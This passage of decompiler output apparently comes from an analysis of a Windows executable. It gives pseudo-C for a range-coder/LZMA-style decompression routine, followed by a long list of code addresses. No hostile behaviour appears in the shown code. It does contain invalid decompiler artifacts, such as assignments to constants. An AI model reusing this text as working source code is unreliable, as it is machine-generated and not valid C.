							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d3b
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x00000000
                                                              0x00407195
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00000000
                                                              0x00407004
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x004071c0
                                                              0x004071c0
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x00406c85
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x00000000
                                                              0x004071bc
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069b2
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406cfd
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00000000
                                                              0x00406f8e
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x00000000
                                                              0x00407101
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
